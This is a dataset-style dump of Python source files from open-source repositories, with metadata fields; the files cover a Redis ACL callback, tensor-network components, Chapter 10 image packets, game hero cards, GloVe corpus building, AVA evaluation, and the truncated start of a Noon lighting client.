f7052438c8473f910759ed0cf1b17b8320d04873
| 653
|
py
|
Python
|
coredis/response/callbacks/acl.py
|
alisaifee/aredis
|
c5764a5a2a29c4ed25278548aa54eece94974440
|
[
"MIT"
] | null | null | null |
coredis/response/callbacks/acl.py
|
alisaifee/aredis
|
c5764a5a2a29c4ed25278548aa54eece94974440
|
[
"MIT"
] | null | null | null |
coredis/response/callbacks/acl.py
|
alisaifee/aredis
|
c5764a5a2a29c4ed25278548aa54eece94974440
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from coredis.response.callbacks import (
DictCallback,
ResponseCallback,
SimpleStringCallback,
)
from coredis.response.utils import flat_pairs_to_dict
from coredis.typing import Any, AnyStr, Mapping, Tuple, Union
class ACLLogCallback(ResponseCallback):
def transform(
self, response: Any, **options: Any
) -> Union[bool, Tuple[Mapping[AnyStr, AnyStr], ...]]:
if options.get("reset"):
return SimpleStringCallback()(response)
else:
return tuple(
DictCallback(transform_function=flat_pairs_to_dict)(r) for r in response
)
| 29.681818
| 88
| 0.679939
|
from __future__ import annotations
from coredis.response.callbacks import (
DictCallback,
ResponseCallback,
SimpleStringCallback,
)
from coredis.response.utils import flat_pairs_to_dict
from coredis.typing import Any, AnyStr, Mapping, Tuple, Union
class ACLLogCallback(ResponseCallback):
def transform(
self, response: Any, **options: Any
) -> Union[bool, Tuple[Mapping[AnyStr, AnyStr], ...]]:
if options.get("reset"):
return SimpleStringCallback()(response)
else:
return tuple(
DictCallback(transform_function=flat_pairs_to_dict)(r) for r in response
)
| true
| true
|
f705245746d0ebe045665a381e0da85b1675e0cb
| 297
|
py
|
Python
|
tensornetwork/component_factory.py
|
gazay/TensorNetwork
|
1564a24d6fef6d6ecd90dc01b55a5aa3f5d71b8e
|
[
"Apache-2.0"
] | 2
|
2019-11-22T20:03:47.000Z
|
2020-09-03T20:25:51.000Z
|
tensornetwork/component_factory.py
|
gazay/TensorNetwork
|
1564a24d6fef6d6ecd90dc01b55a5aa3f5d71b8e
|
[
"Apache-2.0"
] | null | null | null |
tensornetwork/component_factory.py
|
gazay/TensorNetwork
|
1564a24d6fef6d6ecd90dc01b55a5aa3f5d71b8e
|
[
"Apache-2.0"
] | 3
|
2020-04-27T10:28:21.000Z
|
2021-03-02T10:02:14.000Z
|
from tensornetwork.network_components import Node, CopyNode, Edge
_COMPONENTS = {
"Node": Node,
"CopyNode": CopyNode,
"Edge": Edge,
}
def get_component(name):
if name not in _COMPONENTS:
raise ValueError("Component {} does not exist".format(name))
return _COMPONENTS[name]
| 19.8
| 65
| 0.703704
|
from tensornetwork.network_components import Node, CopyNode, Edge
_COMPONENTS = {
"Node": Node,
"CopyNode": CopyNode,
"Edge": Edge,
}
def get_component(name):
if name not in _COMPONENTS:
raise ValueError("Component {} does not exist".format(name))
return _COMPONENTS[name]
| true
| true
|
f7052482790afe437f8491bcd68bb6a5d319ef0d
| 3,563
|
py
|
Python
|
chapter10/image.py
|
atac-bham/pychapter10
|
292f15162d4a637144ab0e64ed7215a4ab4f37df
|
[
"BSD-3-Clause"
] | 7
|
2021-04-27T12:14:42.000Z
|
2021-11-17T08:31:19.000Z
|
chapter10/image.py
|
atac-bham/pychapter10
|
292f15162d4a637144ab0e64ed7215a4ab4f37df
|
[
"BSD-3-Clause"
] | 26
|
2020-07-20T21:28:57.000Z
|
2022-02-17T13:36:03.000Z
|
chapter10/image.py
|
atac-bham/pychapter10
|
292f15162d4a637144ab0e64ed7215a4ab4f37df
|
[
"BSD-3-Clause"
] | null | null | null |
from .util import BitFormat
from . import packet
__all__ = ('ImageF0', 'ImageF1', 'ImageF2')
class ImageMessage:
def __repr__(self):
return '<Image Segment>'
class ImageF0(packet.Packet):
"""Image data
.. py:attribute:: segment_length
.. py:attribute:: iph
.. py:attribute:: sum
* 0 - Less than one complete image
* 1 - One complete image
* 2 - Multiple complete images
* 3 - Multiple incomplete images
.. py:attribute:: parts
Indicates which piece[s] are of the frame are contained in the packet:
"""
csdw_format = BitFormat('''
u27 length
u1 iph
u3 sum
u3 parts''')
class Message(packet.Message, ImageMessage):
"""
.. py:attribute:: ipts
If IPH is true (see above), containts intra-packet timestamp
"""
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
if self.iph:
self.Message.FORMAT = BitFormat('u64 ipts')
class ImageF1(packet.Packet):
"""Still imagery
.. py:attribute:: format
* 0 - MIL-STD-2500 National Imagery Transmission Format
* 1 - JPEG File Interchange Format
* 2 - JPEG 2000 (ISO/IEC 154444-1)
* 3 - Portable Network Graphics Format (PNG)
.. py:attribute:: iph
.. py:attribute:: sum
* 0 - Contains less than one complete image
* 1 - Contains one complete image
* 2 - Contains multiple complete images
* 3 - Contains multiple incomplete messages
.. py:attribute:: parts
* 0 - Doesn't contain first or last segment of the image
* 1 - Contains first segment of image
* 2 - Contains multiple complete messages
* 3 - Contains both first and last segment of image
"""
csdw_format = BitFormat('''
p23
u4 format
u1 iph
u2 sum
u2 parts''')
class Message(packet.Message, ImageMessage):
"""
.. py:attribute:: ipts
If IPH is true (see above), containts intra-packet timestamp
.. py:attribute:: length
Length of image or segment (bytes)
"""
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
fmt = ''
if self.iph:
fmt = 'u64 ipts\n'
self.Message.FORMAT = BitFormat(fmt + 'u32 length')
class ImageF2(packet.Packet):
"""Dynamic Imagery
.. py:attribute:: format
Refer to chapter 10 standard
.. py:attribute:: iph
.. py:attribute:: sum
* 0 - Contains less than one complete image (segment)
* 1 - Contains one complete image
* 2 - Contains multiple complete images
.. py:attribute:: parts
* 0 - Doesn't contain first or last segment of the image
* 1 - Contains first segment of image
* 2 - Contains last segment of image
"""
csdw_format = BitFormat('''
p21
u6 format
u1 iph
u2 sum
u2 parts''')
class Message(packet.Message, ImageMessage):
"""
.. py:attribute:: ipts
If IPH is true (see above), containts intra-packet timestamp
.. py:attribute:: length
Length of image or segment (bytes)
"""
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
fmt = ''
if self.iph:
fmt = 'u64 ipts\n'
self.Message.FORMAT = BitFormat(fmt + 'u32 length')
| 23.912752
| 78
| 0.572551
|
from .util import BitFormat
from . import packet
__all__ = ('ImageF0', 'ImageF1', 'ImageF2')
class ImageMessage:
def __repr__(self):
return '<Image Segment>'
class ImageF0(packet.Packet):
csdw_format = BitFormat('''
u27 length
u1 iph
u3 sum
u3 parts''')
class Message(packet.Message, ImageMessage):
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
if self.iph:
self.Message.FORMAT = BitFormat('u64 ipts')
class ImageF1(packet.Packet):
csdw_format = BitFormat('''
p23
u4 format
u1 iph
u2 sum
u2 parts''')
class Message(packet.Message, ImageMessage):
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
fmt = ''
if self.iph:
fmt = 'u64 ipts\n'
self.Message.FORMAT = BitFormat(fmt + 'u32 length')
class ImageF2(packet.Packet):
csdw_format = BitFormat('''
p21
u6 format
u1 iph
u2 sum
u2 parts''')
class Message(packet.Message, ImageMessage):
def __init__(self, *args, **kwargs):
packet.Packet.__init__(self, *args, **kwargs)
fmt = ''
if self.iph:
fmt = 'u64 ipts\n'
self.Message.FORMAT = BitFormat(fmt + 'u32 length')
| true
| true
|
f70524fefa5302b732e4c8435ba2d80c5c960673
| 3,066
|
py
|
Python
|
SDWLE/cards_copy/heroes.py
|
jomyhuang/sdwle
|
9b6e916567e09c7cba4a171fe0adf0f47009a8c3
|
[
"MIT"
] | null | null | null |
SDWLE/cards_copy/heroes.py
|
jomyhuang/sdwle
|
9b6e916567e09c7cba4a171fe0adf0f47009a8c3
|
[
"MIT"
] | null | null | null |
SDWLE/cards_copy/heroes.py
|
jomyhuang/sdwle
|
9b6e916567e09c7cba4a171fe0adf0f47009a8c3
|
[
"MIT"
] | null | null | null |
from SDWLE.cards.base import HeroCard
from SDWLE.constants import CHARACTER_CLASS, MINION_TYPE
from SDWLE.powers import MagePower, DruidPower, HunterPower, PaladinPower, PriestPower, RoguePower,\
ShamanPower, WarlockPower, WarriorPower, JaraxxusPower, DieInsect
class Malfurion(HeroCard):
def __init__(self):
super().__init__("Malfurion Stormrage", CHARACTER_CLASS.DRUID, 30, DruidPower)
class Rexxar(HeroCard):
def __init__(self):
super().__init__("Rexxar", CHARACTER_CLASS.HUNTER, 30, HunterPower)
class Jaina(HeroCard):
def __init__(self):
super().__init__("Jaina Proudmoore", CHARACTER_CLASS.MAGE, 30, MagePower)
class Uther(HeroCard):
def __init__(self):
super().__init__("Uther the Lightbringer", CHARACTER_CLASS.PALADIN, 30, PaladinPower)
class Anduin(HeroCard):
def __init__(self):
super().__init__("Anduin Wrynn", CHARACTER_CLASS.PRIEST, 30, PriestPower)
class Valeera(HeroCard):
def __init__(self):
super().__init__("Valeera Sanguinar", CHARACTER_CLASS.ROGUE, 30, RoguePower)
class Thrall(HeroCard):
def __init__(self):
super().__init__("Thrall", CHARACTER_CLASS.SHAMAN, 30, ShamanPower)
class Guldan(HeroCard):
def __init__(self):
super().__init__("Gul'dan", CHARACTER_CLASS.WARLOCK, 30, WarlockPower)
class Garrosh(HeroCard):
def __init__(self):
super().__init__("Garrosh Hellscream", CHARACTER_CLASS.WARRIOR, 30, WarriorPower)
class Jaraxxus(HeroCard):
def __init__(self):
super().__init__("Lord Jaraxxus", CHARACTER_CLASS.WARLOCK, 15, JaraxxusPower, MINION_TYPE.DEMON,
ref_name="Lord Jarraxus (hero)")
class Ragnaros(HeroCard):
def __init__(self):
super().__init__("Ragnaros the Firelord (hero)", CHARACTER_CLASS.ALL, 8, DieInsect)
def hero_for_class(character_class):
if character_class == CHARACTER_CLASS.DRUID:
return Malfurion()
elif character_class == CHARACTER_CLASS.HUNTER:
return Rexxar()
elif character_class == CHARACTER_CLASS.MAGE:
return Jaina()
elif character_class == CHARACTER_CLASS.PRIEST:
return Anduin()
elif character_class == CHARACTER_CLASS.PALADIN:
return Uther()
elif character_class == CHARACTER_CLASS.ROGUE:
return Valeera()
elif character_class == CHARACTER_CLASS.SHAMAN:
return Thrall()
elif character_class == CHARACTER_CLASS.WARLOCK:
return Guldan()
elif character_class == CHARACTER_CLASS.WARRIOR:
return Garrosh()
else:
return Jaina()
__hero_lookup = {"Jaina": Jaina,
"Malfurion": Malfurion,
"Rexxar": Rexxar,
"Anduin": Anduin,
"Uther": Uther,
"Gul'dan": Guldan,
"Valeera": Valeera,
"Thrall": Thrall,
"Garrosh": Garrosh,
"Jaraxxus": Jaraxxus,
"Ragnaros": Ragnaros,
}
def hero_from_name(name):
return __hero_lookup[name]()
| 30.356436
| 104
| 0.660144
|
from SDWLE.cards.base import HeroCard
from SDWLE.constants import CHARACTER_CLASS, MINION_TYPE
from SDWLE.powers import MagePower, DruidPower, HunterPower, PaladinPower, PriestPower, RoguePower,\
ShamanPower, WarlockPower, WarriorPower, JaraxxusPower, DieInsect
class Malfurion(HeroCard):
def __init__(self):
super().__init__("Malfurion Stormrage", CHARACTER_CLASS.DRUID, 30, DruidPower)
class Rexxar(HeroCard):
def __init__(self):
super().__init__("Rexxar", CHARACTER_CLASS.HUNTER, 30, HunterPower)
class Jaina(HeroCard):
def __init__(self):
super().__init__("Jaina Proudmoore", CHARACTER_CLASS.MAGE, 30, MagePower)
class Uther(HeroCard):
def __init__(self):
super().__init__("Uther the Lightbringer", CHARACTER_CLASS.PALADIN, 30, PaladinPower)
class Anduin(HeroCard):
def __init__(self):
super().__init__("Anduin Wrynn", CHARACTER_CLASS.PRIEST, 30, PriestPower)
class Valeera(HeroCard):
def __init__(self):
super().__init__("Valeera Sanguinar", CHARACTER_CLASS.ROGUE, 30, RoguePower)
class Thrall(HeroCard):
def __init__(self):
super().__init__("Thrall", CHARACTER_CLASS.SHAMAN, 30, ShamanPower)
class Guldan(HeroCard):
def __init__(self):
super().__init__("Gul'dan", CHARACTER_CLASS.WARLOCK, 30, WarlockPower)
class Garrosh(HeroCard):
def __init__(self):
super().__init__("Garrosh Hellscream", CHARACTER_CLASS.WARRIOR, 30, WarriorPower)
class Jaraxxus(HeroCard):
def __init__(self):
super().__init__("Lord Jaraxxus", CHARACTER_CLASS.WARLOCK, 15, JaraxxusPower, MINION_TYPE.DEMON,
ref_name="Lord Jarraxus (hero)")
class Ragnaros(HeroCard):
def __init__(self):
super().__init__("Ragnaros the Firelord (hero)", CHARACTER_CLASS.ALL, 8, DieInsect)
def hero_for_class(character_class):
if character_class == CHARACTER_CLASS.DRUID:
return Malfurion()
elif character_class == CHARACTER_CLASS.HUNTER:
return Rexxar()
elif character_class == CHARACTER_CLASS.MAGE:
return Jaina()
elif character_class == CHARACTER_CLASS.PRIEST:
return Anduin()
elif character_class == CHARACTER_CLASS.PALADIN:
return Uther()
elif character_class == CHARACTER_CLASS.ROGUE:
return Valeera()
elif character_class == CHARACTER_CLASS.SHAMAN:
return Thrall()
elif character_class == CHARACTER_CLASS.WARLOCK:
return Guldan()
elif character_class == CHARACTER_CLASS.WARRIOR:
return Garrosh()
else:
return Jaina()
__hero_lookup = {"Jaina": Jaina,
"Malfurion": Malfurion,
"Rexxar": Rexxar,
"Anduin": Anduin,
"Uther": Uther,
"Gul'dan": Guldan,
"Valeera": Valeera,
"Thrall": Thrall,
"Garrosh": Garrosh,
"Jaraxxus": Jaraxxus,
"Ragnaros": Ragnaros,
}
def hero_from_name(name):
return __hero_lookup[name]()
| true
| true
|
f705257c65c84a3ef53edac3abe051b1978185f8
| 2,667
|
py
|
Python
|
glove/corpus.py
|
thibaultprouteau/glove-python
|
749494290fdfd24379dcc2e244c583ee61808634
|
[
"Apache-2.0"
] | 1,148
|
2015-01-01T02:27:31.000Z
|
2022-03-31T17:16:05.000Z
|
glove/corpus.py
|
thibaultprouteau/glove-python
|
749494290fdfd24379dcc2e244c583ee61808634
|
[
"Apache-2.0"
] | 78
|
2015-01-01T10:18:54.000Z
|
2021-08-06T06:53:24.000Z
|
glove/corpus.py
|
thibaultprouteau/glove-python
|
749494290fdfd24379dcc2e244c583ee61808634
|
[
"Apache-2.0"
] | 352
|
2015-01-02T06:01:17.000Z
|
2022-03-22T12:21:51.000Z
|
# Cooccurrence matrix construction tools
# for fitting the GloVe model.
import numpy as np
try:
# Python 2 compat
import cPickle as pickle
except ImportError:
import pickle
from .corpus_cython import construct_cooccurrence_matrix
class Corpus(object):
"""
Class for constructing a cooccurrence matrix
from a corpus.
A dictionry mapping words to ids can optionally
be supplied. If left None, it will be constructed
from the corpus.
"""
def __init__(self, dictionary=None):
self.dictionary = {}
self.dictionary_supplied = False
self.matrix = None
if dictionary is not None:
self._check_dict(dictionary)
self.dictionary = dictionary
self.dictionary_supplied = True
def _check_dict(self, dictionary):
if (np.max(list(dictionary.values())) != (len(dictionary) - 1)):
raise Exception('The largest id in the dictionary '
'should be equal to its length minus one.')
if np.min(list(dictionary.values())) != 0:
raise Exception('Dictionary ids should start at zero')
def fit(self, corpus, window=10, ignore_missing=False):
"""
Perform a pass through the corpus to construct
the cooccurrence matrix.
Parameters:
- iterable of lists of strings corpus
- int window: the length of the (symmetric)
context window used for cooccurrence.
- bool ignore_missing: whether to ignore words missing from
the dictionary (if it was supplied).
Context window distances will be preserved
even if out-of-vocabulary words are
ignored.
If False, a KeyError is raised.
"""
self.matrix = construct_cooccurrence_matrix(corpus,
self.dictionary,
int(self.dictionary_supplied),
int(window),
int(ignore_missing))
def save(self, filename):
with open(filename, 'wb') as savefile:
pickle.dump((self.dictionary, self.matrix),
savefile,
protocol=pickle.HIGHEST_PROTOCOL)
@classmethod
def load(cls, filename):
instance = cls()
with open(filename, 'rb') as savefile:
instance.dictionary, instance.matrix = pickle.load(savefile)
return instance
| 32.52439
| 82
| 0.558305
|
import numpy as np
try:
import cPickle as pickle
except ImportError:
import pickle
from .corpus_cython import construct_cooccurrence_matrix
class Corpus(object):
def __init__(self, dictionary=None):
self.dictionary = {}
self.dictionary_supplied = False
self.matrix = None
if dictionary is not None:
self._check_dict(dictionary)
self.dictionary = dictionary
self.dictionary_supplied = True
def _check_dict(self, dictionary):
if (np.max(list(dictionary.values())) != (len(dictionary) - 1)):
raise Exception('The largest id in the dictionary '
'should be equal to its length minus one.')
if np.min(list(dictionary.values())) != 0:
raise Exception('Dictionary ids should start at zero')
def fit(self, corpus, window=10, ignore_missing=False):
self.matrix = construct_cooccurrence_matrix(corpus,
self.dictionary,
int(self.dictionary_supplied),
int(window),
int(ignore_missing))
def save(self, filename):
with open(filename, 'wb') as savefile:
pickle.dump((self.dictionary, self.matrix),
savefile,
protocol=pickle.HIGHEST_PROTOCOL)
@classmethod
def load(cls, filename):
instance = cls()
with open(filename, 'rb') as savefile:
instance.dictionary, instance.matrix = pickle.load(savefile)
return instance
| true
| true
|
f7052ac37e1c8ecd7b7eb4f960efd1bcda7a3958
| 8,320
|
py
|
Python
|
action-baseline/evaluation/get_ava_performance.py
|
leaderj1001/Action-Localization
|
04d972e6dc3c07d347c70893723d91487c1c8cbd
|
[
"MIT"
] | 24
|
2019-07-10T15:13:27.000Z
|
2021-07-08T12:12:40.000Z
|
action-baseline/evaluation/get_ava_performance.py
|
leaderj1001/Action-Localization
|
04d972e6dc3c07d347c70893723d91487c1c8cbd
|
[
"MIT"
] | 7
|
2019-10-06T12:22:04.000Z
|
2020-04-15T13:14:10.000Z
|
action-baseline/evaluation/get_ava_performance.py
|
leaderj1001/Action-Localization
|
04d972e6dc3c07d347c70893723d91487c1c8cbd
|
[
"MIT"
] | 4
|
2019-10-31T09:01:15.000Z
|
2021-03-26T04:20:21.000Z
|
r"""Compute action detection performance for the AVA dataset.
Please send any questions about this code to the Google Group ava-dataset-users:
https://groups.google.com/forum/#!forum/ava-dataset-users
Example usage:
python -O get_ava_performance.py \
-l ava/ava_action_list_v2.1_for_activitynet_2018.pbtxt.txt \
-g ava_val_v2.1.csv \
-e ava_val_excluded_timestamps_v2.1.csv \
-d your_results.csv
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from collections import defaultdict
import csv
import heapq
import logging
import pprint
import sys
import time
import numpy as np
from evaluation.ava import object_detection_evaluation
from evaluation.ava import standard_fields
def print_time(message, start):
logging.info("==> %g seconds to %s", time.time() - start, message)
def make_image_key(video_id, timestamp):
"""Returns a unique identifier for a video id & timestamp."""
return "%s,%04d" % (video_id, int(timestamp))
def read_csv(csv_file, class_whitelist=None, capacity=0):
"""Loads boxes and class labels from a CSV file in the AVA format.
CSV file format described at https://research.google.com/ava/download.html.
Args:
csv_file: A file object.
class_whitelist: If provided, boxes corresponding to (integer) class labels
not in this set are skipped.
capacity: Maximum number of labeled boxes allowed for each example.
Default is 0 where there is no limit.
Returns:
boxes: A dictionary mapping each unique image key (string) to a list of
boxes, given as coordinates [y1, x1, y2, x2].
labels: A dictionary mapping each unique image key (string) to a list of
integer class lables, matching the corresponding box in `boxes`.
scores: A dictionary mapping each unique image key (string) to a list of
score values lables, matching the corresponding label in `labels`. If
scores are not provided in the csv, then they will default to 1.0.
"""
start = time.time()
entries = defaultdict(list)
boxes = defaultdict(list)
labels = defaultdict(list)
scores = defaultdict(list)
reader = csv.reader(csv_file)
for row in reader:
assert len(row) in [7, 8], "Wrong number of columns: " + row
image_key = make_image_key(row[0], row[1])
x1, y1, x2, y2 = [float(n) for n in row[2:6]]
action_id = int(row[6])
if class_whitelist and action_id not in class_whitelist:
continue
score = 1.0
if len(row) == 8:
score = float(row[7])
if capacity < 1 or len(entries[image_key]) < capacity:
heapq.heappush(entries[image_key],
(score, action_id, y1, x1, y2, x2))
elif score > entries[image_key][0][0]:
heapq.heapreplace(entries[image_key],
(score, action_id, y1, x1, y2, x2))
for image_key in entries:
# Evaluation API assumes boxes with descending scores
entry = sorted(entries[image_key], key=lambda tup: -tup[0])
for item in entry:
score, action_id, y1, x1, y2, x2 = item
boxes[image_key].append([y1, x1, y2, x2])
labels[image_key].append(action_id)
scores[image_key].append(score)
print_time("read file " + csv_file.name, start)
return boxes, labels, scores
def read_exclusions(exclusions_file):
"""Reads a CSV file of excluded timestamps.
Args:
exclusions_file: A file object containing a csv of video-id,timestamp.
Returns:
A set of strings containing excluded image keys, e.g. "aaaaaaaaaaa,0904",
or an empty set if exclusions file is None.
"""
excluded = set()
if exclusions_file:
reader = csv.reader(exclusions_file)
for row in reader:
assert len(row) == 2, "Expected only 2 columns, got: " + row
excluded.add(make_image_key(row[0], row[1]))
return excluded
def read_labelmap(labelmap_file):
"""Reads a labelmap without the dependency on protocol buffers.
Args:
labelmap_file: A file object containing a label map protocol buffer.
Returns:
labelmap: The label map in the form used by the object_detection_evaluation
module - a list of {"id": integer, "name": classname } dicts.
class_ids: A set containing all of the valid class id integers.
"""
labelmap = []
class_ids = set()
name = ""
class_id = ""
for line in labelmap_file:
if line.startswith(" name:"):
name = line.split('"')[1]
elif line.startswith(" id:") or line.startswith(" label_id:"):
class_id = int(line.strip().split(" ")[-1])
labelmap.append({"id": class_id, "name": name})
class_ids.add(class_id)
return labelmap, class_ids
def run_evaluation(labelmap, groundtruth, detections, exclusions):
"""Runs evaluations given input files.
Args:
labelmap: file object containing map of labels to consider, in pbtxt format
groundtruth: file object
detections: file object
exclusions: file object or None.
"""
categories, class_whitelist = read_labelmap(labelmap)
logging.info("CATEGORIES (%d):\n%s", len(categories),
pprint.pformat(categories, indent=2))
excluded_keys = read_exclusions(exclusions)
pascal_evaluator = object_detection_evaluation.PascalDetectionEvaluator(
categories)
# Reads the ground truth data.
boxes, labels, _ = read_csv(groundtruth, class_whitelist, 0)
start = time.time()
for image_key in boxes:
if image_key in excluded_keys:
logging.info(("Found excluded timestamp in ground truth: %s. "
"It will be ignored."), image_key)
continue
pascal_evaluator.add_single_ground_truth_image_info(
image_key, {
standard_fields.InputDataFields.groundtruth_boxes:
np.array(boxes[image_key], dtype=float),
standard_fields.InputDataFields.groundtruth_classes:
np.array(labels[image_key], dtype=int),
standard_fields.InputDataFields.groundtruth_difficult:
np.zeros(len(boxes[image_key]), dtype=bool)
})
print_time("convert groundtruth", start)
# Reads detections data.
boxes, labels, scores = read_csv(detections, class_whitelist, 50)
start = time.time()
for image_key in boxes:
if image_key in excluded_keys:
logging.info(("Found excluded timestamp in detections: %s. "
"It will be ignored."), image_key)
continue
pascal_evaluator.add_single_detected_image_info(
image_key, {
standard_fields.DetectionResultFields.detection_boxes:
np.array(boxes[image_key], dtype=float),
standard_fields.DetectionResultFields.detection_classes:
np.array(labels[image_key], dtype=int),
standard_fields.DetectionResultFields.detection_scores:
np.array(scores[image_key], dtype=float)
})
print_time("convert detections", start)
start = time.time()
metrics = pascal_evaluator.evaluate()
print_time("run_evaluator", start)
pprint.pprint(metrics, indent=2)
def parse_arguments():
"""Parses command-line flags.
Returns:
args: a named tuple containing three file objects args.labelmap,
args.groundtruth, and args.detections.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
"-l",
"--labelmap",
help="Filename of label map",
type=argparse.FileType("r"),
default="./ava/ava_action_list_v2.1_for_activitynet_2018.pbtxt.txt")
parser.add_argument(
"-g",
"--groundtruth",
default='./ava_val_v2.2.csv',
help="CSV file containing ground truth.",
type=argparse.FileType("r"),
# required=True
)
parser.add_argument(
"-d",
"--detections",
default='results.csv',
help="CSV file containing inferred action detections.",
type=argparse.FileType("r"),
# required=True
)
parser.add_argument(
"-e",
"--exclusions",
help=("Optional CSV file containing videoid,timestamp pairs to exclude from evaluation."),
type=argparse.FileType("r"),
required=False)
return parser.parse_args()
def main():
logging.basicConfig(level=logging.INFO)
args = parse_arguments()
run_evaluation(**vars(args))
if __name__ == "__main__":
main()
| 33.548387
| 98
| 0.679688
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from collections import defaultdict
import csv
import heapq
import logging
import pprint
import sys
import time
import numpy as np
from evaluation.ava import object_detection_evaluation
from evaluation.ava import standard_fields
def print_time(message, start):
logging.info("==> %g seconds to %s", time.time() - start, message)
def make_image_key(video_id, timestamp):
return "%s,%04d" % (video_id, int(timestamp))
def read_csv(csv_file, class_whitelist=None, capacity=0):
start = time.time()
entries = defaultdict(list)
boxes = defaultdict(list)
labels = defaultdict(list)
scores = defaultdict(list)
reader = csv.reader(csv_file)
for row in reader:
assert len(row) in [7, 8], "Wrong number of columns: " + row
image_key = make_image_key(row[0], row[1])
x1, y1, x2, y2 = [float(n) for n in row[2:6]]
action_id = int(row[6])
if class_whitelist and action_id not in class_whitelist:
continue
score = 1.0
if len(row) == 8:
score = float(row[7])
if capacity < 1 or len(entries[image_key]) < capacity:
heapq.heappush(entries[image_key],
(score, action_id, y1, x1, y2, x2))
elif score > entries[image_key][0][0]:
heapq.heapreplace(entries[image_key],
(score, action_id, y1, x1, y2, x2))
for image_key in entries:
entry = sorted(entries[image_key], key=lambda tup: -tup[0])
for item in entry:
score, action_id, y1, x1, y2, x2 = item
boxes[image_key].append([y1, x1, y2, x2])
labels[image_key].append(action_id)
scores[image_key].append(score)
print_time("read file " + csv_file.name, start)
return boxes, labels, scores
def read_exclusions(exclusions_file):
excluded = set()
if exclusions_file:
reader = csv.reader(exclusions_file)
for row in reader:
assert len(row) == 2, "Expected only 2 columns, got: " + row
excluded.add(make_image_key(row[0], row[1]))
return excluded
def read_labelmap(labelmap_file):
labelmap = []
class_ids = set()
name = ""
class_id = ""
for line in labelmap_file:
if line.startswith(" name:"):
name = line.split('"')[1]
elif line.startswith(" id:") or line.startswith(" label_id:"):
class_id = int(line.strip().split(" ")[-1])
labelmap.append({"id": class_id, "name": name})
class_ids.add(class_id)
return labelmap, class_ids
def run_evaluation(labelmap, groundtruth, detections, exclusions):
categories, class_whitelist = read_labelmap(labelmap)
logging.info("CATEGORIES (%d):\n%s", len(categories),
pprint.pformat(categories, indent=2))
excluded_keys = read_exclusions(exclusions)
pascal_evaluator = object_detection_evaluation.PascalDetectionEvaluator(
categories)
# Reads the ground truth data.
boxes, labels, _ = read_csv(groundtruth, class_whitelist, 0)
start = time.time()
for image_key in boxes:
if image_key in excluded_keys:
logging.info(("Found excluded timestamp in ground truth: %s. "
"It will be ignored."), image_key)
continue
pascal_evaluator.add_single_ground_truth_image_info(
image_key, {
standard_fields.InputDataFields.groundtruth_boxes:
np.array(boxes[image_key], dtype=float),
standard_fields.InputDataFields.groundtruth_classes:
np.array(labels[image_key], dtype=int),
standard_fields.InputDataFields.groundtruth_difficult:
np.zeros(len(boxes[image_key]), dtype=bool)
})
print_time("convert groundtruth", start)
# Reads detections data.
boxes, labels, scores = read_csv(detections, class_whitelist, 50)
start = time.time()
for image_key in boxes:
if image_key in excluded_keys:
logging.info(("Found excluded timestamp in detections: %s. "
"It will be ignored."), image_key)
continue
pascal_evaluator.add_single_detected_image_info(
image_key, {
standard_fields.DetectionResultFields.detection_boxes:
np.array(boxes[image_key], dtype=float),
standard_fields.DetectionResultFields.detection_classes:
np.array(labels[image_key], dtype=int),
standard_fields.DetectionResultFields.detection_scores:
np.array(scores[image_key], dtype=float)
})
print_time("convert detections", start)
start = time.time()
metrics = pascal_evaluator.evaluate()
print_time("run_evaluator", start)
pprint.pprint(metrics, indent=2)
def parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument(
"-l",
"--labelmap",
help="Filename of label map",
type=argparse.FileType("r"),
default="./ava/ava_action_list_v2.1_for_activitynet_2018.pbtxt.txt")
parser.add_argument(
"-g",
"--groundtruth",
default='./ava_val_v2.2.csv',
help="CSV file containing ground truth.",
type=argparse.FileType("r"),
# required=True
)
parser.add_argument(
"-d",
"--detections",
default='results.csv',
help="CSV file containing inferred action detections.",
type=argparse.FileType("r"),
# required=True
)
parser.add_argument(
"-e",
"--exclusions",
help=("Optional CSV file containing videoid,timestamp pairs to exclude from evaluation."),
type=argparse.FileType("r"),
required=False)
return parser.parse_args()
def main():
logging.basicConfig(level=logging.INFO)
args = parse_arguments()
run_evaluation(**vars(args))
if __name__ == "__main__":
main()
| true
| true
|
f7052b09a9ff46196bd8601792bc9ccca71459ca
| 192
|
py
|
Python
|
IdentityAccessManager/__init__.py
|
silop4all/iam
|
691316ca9ea7d3d10a3197b4d028e44e333c7060
|
[
"Apache-2.0"
] | 2
|
2018-02-27T20:51:08.000Z
|
2019-11-25T10:11:59.000Z
|
IdentityAccessManager/__init__.py
|
silop4all/iam
|
691316ca9ea7d3d10a3197b4d028e44e333c7060
|
[
"Apache-2.0"
] | null | null | null |
IdentityAccessManager/__init__.py
|
silop4all/iam
|
691316ca9ea7d3d10a3197b4d028e44e333c7060
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
# This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import app as celery_app
| 32
| 55
| 0.786458
|
from __future__ import absolute_import
from .celery import app as celery_app
| true
| true
|
f7052baf507e53e8f68e20a709510cb920844c03
| 11,928
|
py
|
Python
|
aiopynoon/noon.py
|
alistairg/aiopynoon
|
f1340bd6a56de661e09f9f90fb28c331df2d5653
|
[
"MIT"
] | 1
|
2020-06-18T06:29:40.000Z
|
2020-06-18T06:29:40.000Z
|
aiopynoon/noon.py
|
alistairg/aiopynoon
|
f1340bd6a56de661e09f9f90fb28c331df2d5653
|
[
"MIT"
] | null | null | null |
aiopynoon/noon.py
|
alistairg/aiopynoon
|
f1340bd6a56de661e09f9f90fb28c331df2d5653
|
[
"MIT"
] | null | null | null |
import logging
import asyncio
from asyncio import CancelledError
from aiohttp import ClientSession, WSMsgType, ClientTimeout, WSServerHandshakeError
import json
import datetime
import traceback
import typing
from .const import (
LOGIN_URL,
DEX_URL,
Guid
)
from .space import NoonSpace
from .line import NoonLine
from .entity import NoonEntity
from .scene import NoonScene
from .exceptions import (
NoonAuthenticationError,
